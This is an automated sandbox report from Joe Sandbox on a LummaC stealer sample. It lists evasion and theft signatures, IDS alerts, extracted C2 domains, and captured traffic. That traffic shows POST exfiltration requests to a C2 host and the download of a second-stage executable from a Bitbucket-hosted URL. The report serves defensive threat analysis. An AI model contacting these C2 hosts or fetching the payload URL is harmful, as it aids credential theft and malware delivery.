Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LP4a6BowQN.exe

Overview

General Information

Sample name:LP4a6BowQN.exe
renamed because original name is a hash value
Original sample name:80429ec2b7c1a75bc06b68846eb8be34.exe
Analysis ID:1579735
MD5:80429ec2b7c1a75bc06b68846eb8be34
SHA1:b58d0acbef2af53e2d507cfd4fb3c07ea5d6a91e
SHA256:20255112ad07c22d1d56b35fb01dbf5592bd679dd8903d66bfe871badae4b0f2
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • LP4a6BowQN.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\LP4a6BowQN.exe" MD5: 80429EC2B7C1A75BC06B68846EB8BE34)
    • WerFault.exe (PID: 1412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1948 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["supporse-comment.cyou", "hosue-billowy.cyou", "cuddlyready.xyz", "sendypaster.xyz", "ripe-blade.cyou", "steppriflej.xyz", "smash-boiling.cyou", "pollution-raker.cyou", "greywe-snotty.cyou"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: LP4a6BowQN.exe PID: 7624JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: LP4a6BowQN.exe PID: 7624JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: LP4a6BowQN.exe PID: 7624JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:19:03.502498+010020283713Unknown Traffic192.168.2.749700104.21.32.96443TCP
                2024-12-23T08:19:05.590428+010020283713Unknown Traffic192.168.2.749701104.21.32.96443TCP
                2024-12-23T08:19:13.114569+010020283713Unknown Traffic192.168.2.749713104.21.32.96443TCP
                2024-12-23T08:19:15.782207+010020283713Unknown Traffic192.168.2.749719104.21.32.96443TCP
                2024-12-23T08:19:18.282621+010020283713Unknown Traffic192.168.2.749725104.21.32.96443TCP
                2024-12-23T08:19:20.990517+010020283713Unknown Traffic192.168.2.749735104.21.32.96443TCP
                2024-12-23T08:19:23.714226+010020283713Unknown Traffic192.168.2.749747104.21.32.96443TCP
                2024-12-23T08:19:29.751080+010020283713Unknown Traffic192.168.2.749758104.21.32.96443TCP
                2024-12-23T08:19:32.053151+010020283713Unknown Traffic192.168.2.749764185.166.143.49443TCP
                2024-12-23T08:19:34.464774+010020283713Unknown Traffic192.168.2.74977516.182.101.249443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:19:04.247996+010020546531A Network Trojan was detected192.168.2.749700104.21.32.96443TCP
                2024-12-23T08:19:11.524442+010020546531A Network Trojan was detected192.168.2.749701104.21.32.96443TCP
                2024-12-23T08:19:30.519681+010020546531A Network Trojan was detected192.168.2.749758104.21.32.96443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:19:04.247996+010020498361A Network Trojan was detected192.168.2.749700104.21.32.96443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:19:11.524442+010020498121A Network Trojan was detected192.168.2.749701104.21.32.96443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:19:21.966381+010020480941Malware Command and Control Activity Detected192.168.2.749735104.21.32.96443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:19:23.841820+010028438641A Network Trojan was detected192.168.2.749747104.21.32.96443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: LP4a6BowQN.exeAvira: detected
                Source: LP4a6BowQN.exe.7624.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["supporse-comment.cyou", "hosue-billowy.cyou", "cuddlyready.xyz", "sendypaster.xyz", "ripe-blade.cyou", "steppriflej.xyz", "smash-boiling.cyou", "pollution-raker.cyou", "greywe-snotty.cyou"], "Build id": "LOGS11--LiveTraffic"}
                Source: LP4a6BowQN.exeReversingLabs: Detection: 57%
                Source: LP4a6BowQN.exeVirustotal: Detection: 58%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: LP4a6BowQN.exeJoe Sandbox ML: detected
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: pollution-raker.cyou
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: hosue-billowy.cyou
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: ripe-blade.cyou
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: smash-boiling.cyou
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: supporse-comment.cyou
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: greywe-snotty.cyou
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: steppriflej.xyz
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: sendypaster.xyz
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: cuddlyready.xyz
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1299903237.0000000004940000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: LP4a6BowQN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.96:443 -> 192.168.2.7:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49764 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 16.182.101.249:443 -> 192.168.2.7:49775 version: TLS 1.2
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49735 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49758 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:49747 -> 104.21.32.96:443
                Source: Malware configuration extractorURLs: supporse-comment.cyou
                Source: Malware configuration extractorURLs: hosue-billowy.cyou
                Source: Malware configuration extractorURLs: cuddlyready.xyz
                Source: Malware configuration extractorURLs: sendypaster.xyz
                Source: Malware configuration extractorURLs: ripe-blade.cyou
                Source: Malware configuration extractorURLs: steppriflej.xyz
                Source: Malware configuration extractorURLs: smash-boiling.cyou
                Source: Malware configuration extractorURLs: pollution-raker.cyou
                Source: Malware configuration extractorURLs: greywe-snotty.cyou
                Source: DNS query: cuddlyready.xyz
                Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49713 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49747 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49764 -> 185.166.143.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49758 -> 104.21.32.96:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49775 -> 16.182.101.249:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49719 -> 104.21.32.96:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=69HI2EZ9KAF5WW7FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12838Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1TVB1K1GX36IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15046Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9SL1K37UU7GIEZYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20389Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6WVH1GHHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1173Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FDXL9U82User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550856Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9HhgDgDv4DamxGztbRL8AaMRtwH4RffwZACiFAqouZ6XFzfcohb2gfVkHH44WWfa%2BbgFPu5g%2BOCDe%2B7GJ3m%2BCwi76mw1w%3D%3D&Expires=1734939406 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9HhgDgDv4DamxGztbRL8AaMRtwH4RffwZACiFAqouZ6XFzfcohb2gfVkHH44WWfa%2BbgFPu5g%2BOCDe%2B7GJ3m%2BCwi76mw1w%3D%3D&Expires=1734939406 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: cuddlyready.xyz
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: LP4a6BowQN.exe, 00000000.00000003.1662983578.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990583895.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506334302.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microH
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: LP4a6BowQN.exe, 00000000.00000002.1994446587.0000000005AF9000.00000002.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662614324.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662371385.0000000005557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: LP4a6BowQN.exe, 00000000.00000003.1662850371.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1990318345.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
